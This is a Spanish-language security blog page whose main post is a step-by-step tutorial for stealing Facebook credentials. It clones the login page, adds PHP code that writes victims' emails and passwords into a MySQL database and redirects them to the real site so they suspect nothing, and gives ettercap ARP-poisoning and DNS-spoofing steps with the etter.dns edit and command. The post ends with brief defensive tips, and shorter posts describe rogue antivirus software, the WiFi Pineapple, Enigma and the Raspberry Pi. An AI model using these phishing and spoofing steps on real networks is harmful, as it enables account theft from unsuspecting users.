Era una máquina que se empezó a usar en Europa en los años
20´s, disponía de un mecanismo cifrado rotatorio, es decir, se utilizaba para
cifrar y descifrar mensajes, fueron utilizadas por el ejército alemán durante
la segunda guerra mundial, eran muy fáciles de manejar y se creían inviolables,
el ejército alemán cambiaba cada día el código a usar, de tal forma que los aliados
contaban con un único día para descifrarlo porque, al otro día, se volvía a
cambiar, aunque después su cifrado fue descubierto y fue una de las causas por
la que se considera que la segunda guerra mundial terminara más rápido.
Todo respecto a seguridad informatica
martes, 18 de noviembre de 2014
lunes, 20 de octubre de 2014
ATAQUE DNS SPOOFING
COMO
REALIZAR UN SITIO (DE FACEBOOK) POR
MEDIO DE UN ATAQUE DE HOMBRE EN MEDIO.
MATERIAL:
·
Computadora de escritorio o Laptop
·
Sistema
operativo Kali Linux
·
Programa VMWare (este nos servirá para nuestra
maquina atacante sea de forma virtual)
·
Generador de bases de datos (opcional)
·
Internet
El primer paso que haremos es
entrar a símbolos de sistema para saber la “IP” de nuestra máquina que utilizaremos de
servidor web; una vez dentro de símbolos de sistema de Windows utilizaremos el
siguiente comando para mostrarnos nuestra dirección IP.
Una vez tecleado el comando ip config daremos enter y
tendrá que desplazarnos la dirección ip de nuestra máquina que utilizaremos
como servidor de la página web.
Una vez esto capturaremos los
datos (Ip’s) en un bloc de notas, esto
nos servirá para realizar el ataque en el sistema operativo Kali Linux;
ya una vez obtenida nuestra ip lo que haremos será descargar la plantilla o
página de Facebook.
Esto es para hacer el ataque a los usuarios conectados
dentro de un host, ahora el siguiente paso es realizar una base de datos en la
cual nosostros podamos guardar los datos que nos interesan, en este caso los
datos que nos interesan es “e-mail y contraseña” , la base de datos se crea en
el generador de bases de datos de tu preferencia, en este caso se utilizo
mysql.
Ya que se descargó la
página hacemos uso de netbeans en el cual comenzara la inyección de código.
Vamos un nuevo proyecto y a nuestro primer archivo lo
llamamos conexión, e utilizamos el siguiente codigo :
En este punto se manejan las conexiones que enlazaran
nuestro sistema a un gestor de bases de datos en nuestro caso nuestro gestor
es xampp
<?php
//
conexion con MySQL clientes
$dbhost="localhost";
$dbuser="root";
//dbpass="password";
//el
pasword se encuentra en blanco
$dbname="cuenta_face";//nombre de la bd
$tabla="registros";
mysql_connect($dbhost, $dbuser); //se hace la conexion con mysql
mysql_select_db($dbname); //se selecciona la bd
(Aquí se manejaras todas las conexiones, para
enlazarnos con la base de datos (mysql).
En esta pagina falsa de facebook, vamos a utilizar el
siguiente codigo, para tomar lo valores de los campos, correo electronico y
contraseña para registrarlos en nuestra base de datos.
codigo
<form
method="POST"
action="http://localhost/PhpProject1/index.php"
onsubmit="return window.Event && Event.__inlineSubmit
&& Event.__inlineSubmit(this,event)">
<input
type="hidden" name="lsd" value="AVqX0AAv" autocomplete="off">
<?php
if(isset($_POST["Registrar"]))
{
include("conexion.php");
$user=$_POST["user"];
$pass=$_POST["pass"];
{
Aquí se
insertan los datos de la víctima:
$sql="INSERT INTO registros
(user,pass)values('$user','$pass');";
}
if(!mysql_query($sql))
echo
"No se pudieron registrar los datos";
else
?>
<br>
Esta es la pagina original de error de facebook que
nos arrojara automaticamente despues de haber ingresado los datos, la pagina
se redirecciona automaticamente para evitar cual tipo de sospecha.
Codigo para redericcionar:
<meta http-equiv="Refresh"
content="1;url=https://www.facebook.com/login.php?login_attempt=1">
<?php
}
else
{
?>
<form
name="registros"
action="http://localhost/Phpproject1/index_falla.php"
method="POST">
ATAQUE DNS SPOOFING
Ahora entraremos en una maquina virtual con el sistema
operativo kali inux el cual sera la maquina atacante.
Dentro de nuestra maquina virtual atacante lo que
haremos sera lo siguiente. Daremos doble click en el icono computer para
buscar archivos del sistema de nuestro sistema.
Al abrir la ventana debe ser parecida a la siguiente:
Dentro de esta ventana prosegiremos a buscar nuestro
archivo llamado etter.dns, para encontrar este archivo daremos clic sobre file
System.
Dentro de esta carpeta buscaremos una sub carpeta
llamada ‘usr’, una vez localizada daremos clic para abrirla.
Dentro de la carpeta “usr”
buscaremos otra subcarpeta llamada ‘share’ y la abrimos dándole doble clic.
Una vez dentro de esta carpeta
buscaremos una carpeta llamada ettercap ya que esta carpeta es la que contiene
nuestro archivo que buscamos, la abrimos dándole clic.
Una vez dentro de la carpeta
“ettercap” buscaremos nuestro archivo
llamado etter.dns, aquí abriremos nuestro archivo para modificarlo.
Dentro de este archivo lo que
haremos es cambiar la dirección de ip al Facebook original, haciendo creer a
la víctima que en realidad está introduciendo su usuario y contraseña en la
página autentica,
Para eso nos dirigimos a la
parte donde dice #suplantación de servidor DNS y escribimos la dirección de www.facebook.com o facebook.com y tecleamos la ip de nuestra máquina que
servirá de servidor, Una vez hecho esto solo cerramos la ventana.
Una vez cerrada nos dirigiremos
a la terminal de Kali Linux donde teclearemos el siguiente comando
ettercap –T –q –M arp: remote –P
dns_spoof //, y damos enter para ejecutarlo, este comando servirá para infectar
nuestra red y robar el usuario y contraseña del usuario que ingrese a Facebook
con la red infectada.
Solo esperamos a que termine el
proceso de infección y llegue al 100%. Cuando este proceso llegue al 100% la
red estará infectada y solo queda esperar que algún usuario entre a nuestra
página falsa de Facebook.com o nosotros mismos podemos verificarlo estando
dentro del mismo host.
En nuestro caso lo verificamos
con una máquina virtual para saber si se estaba realizando la infección de la
red correctamente, para esto solo tecleamos en la barra de dirección www.facebook.com o Facebook.com.
Como se ve en la imagen el
ataque funciono correctamente ya que el usuario no sabe que está a punto de
ser atacado ya que descargamos la plantilla web de Facebook y no tiene
sospecha.
Para que el usuario no sospeche
que ha sido robado su usuario y contraseña al momento de dar clic en iniciar
sesión será redirigido a la página de Facebook original y así no se tendrá
sospecha alguna de que se le ha robado su usuario y su contraseña de Facebook.
Aquí el usuario es redirigido a
la página oficial y original de Facebook.
Como último solo nos queda
entrar al local host de nuestra máquina que sirvió de servidor y entrar a
nuestra base de datos creada para así mirar los usuarios afectados por este
ataque.
¿Cómo
podemos protegernos de estos ataques?
Podemos protegernos de estos ataques tecleando la ip de la
página de Facebook, ya que la infección solo se hace si se teclea www.facebook.com y con la ip de Facebook no
habría ningún problema
No entrar al sitio si en la dirección no está escrita
http”S”; ejemplo. https://www.facebook.com,
como se ve debe estar escrita la s en http ya que es un método de seguridad y
estar seguro que es la página original.
miércoles, 1 de octubre de 2014
Qué es el Rouge Software?
El Rouge Software es un un programa informático malintencionado (falsos programas de seguridad), que no son lo que aparentan ser, si no mas bien todo lo contrario, nos lo venden como una solución para evitar "contagio" de cualquier tipo de virus.
Estos falsos antivirus, muestran un resultado de infección, cuando "escanea" nuestra computadora, pero en realidad no realiza ningún tipo de escaneo en nuestro computador y por lo mismo no eliminara ningún tipo de infección,
En la imagen se muestra un ejemplo de como funcionan estos programas.
miércoles, 17 de septiembre de 2014
¿Qué es pineapple wifi (piña wifi)?
Es un dispositivo para realizar ataques a paginas que hemos navegado, realizar ataques a redes WiFi, y esto permite espiar todo el trafico que hay en nuestra red en pocas palabras roba claves en Internet.
Con este aparato se atrae a los dispositivos que buscan conectarse a una WiFi.
Esta búsqueda se hace desde una lista que es ya es conocida por nuestra dispositivo, como nuestra red.
Entonces, la Piña WiFi lo que hace es simular ser cualquiera de esas redes de Internet que el dispositivo busca, suplantarla y entregarle el servicio de navegación, pero con la intención de capturarle la información.
Como tratar de defendernos de el?
- Utilizar WPA/WPA2 para cifrar la información en la red.
- Cambiar el nombre de la red del predeterminado.
- Desactivar WiFi Protected Setup.
Foto: Raspberry Pi.
El Raspberry Pi es un mi-ni ordenador, que se conecta a un televisión convencional y a un teclado, ya que cuenta con varios puertos y entradas, dos USD, uno de Ethernet y salida HDMI.
La placa contiene componentes como un ordenador tradicional, (procesador ARM a 700 Mhz, procesador gráfico Video Core IV, y 512 de memoria RAM, aunque no incluye disco duro, ya que utiliza una tarjeta SD para almacenar datos.
Puede ser utilizado para hacer hojas de calculo, procesador de texto y juegos, aunque también reproduce vídeo de alta definición.
Aunque el proyecto fue ideado en el reino unido en el 2006, no fue hasta febrero del 2012 que fue lanzado al mercado, fue desarrollado por estudiantes de la universidad de Cambridge y fue creada para fomentar el desarrollo de la computación en los niños.
Se comercializan dos modelos el A y B, el A es menos completo y su meoria RAM es de 256 MB, solo tiene un puerto usb, no tiene controlador Ethernet y es mas barato y el modelo B es el mas recomendado por los expertos.
Suscribirse a:
Entradas (Atom)